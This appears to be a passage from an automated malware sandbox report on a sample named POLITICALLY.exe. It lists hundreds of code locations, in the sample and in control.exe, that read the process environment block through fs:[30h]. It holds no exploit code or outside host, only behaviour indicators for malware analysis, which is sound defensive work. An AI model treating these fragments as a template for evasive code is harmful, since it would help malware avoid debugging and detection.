        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E27927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2FEA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2C4257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E308B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E305BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2ED380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25DBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E301074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F2073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2790AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2358EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E254120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B69A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E26A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E25C182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E262990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\POLITICALLY.exeCode function: 10_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F8CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E14FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04852581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04822D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048535A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04851DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483D5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048D8DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482AD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04833D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EE539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048AA537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04854D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04863D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A3540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04847D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048BFE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A46A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04868EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048536CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048DFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048376E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048516E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04858E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048E1608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0482E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048DFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04837E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048EAE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0483766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0484AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_04838794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048A7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048637F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_048F070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\control.exeCode function: 23_2_0485A70E mov eax, dword ptr fs:[00000030h]
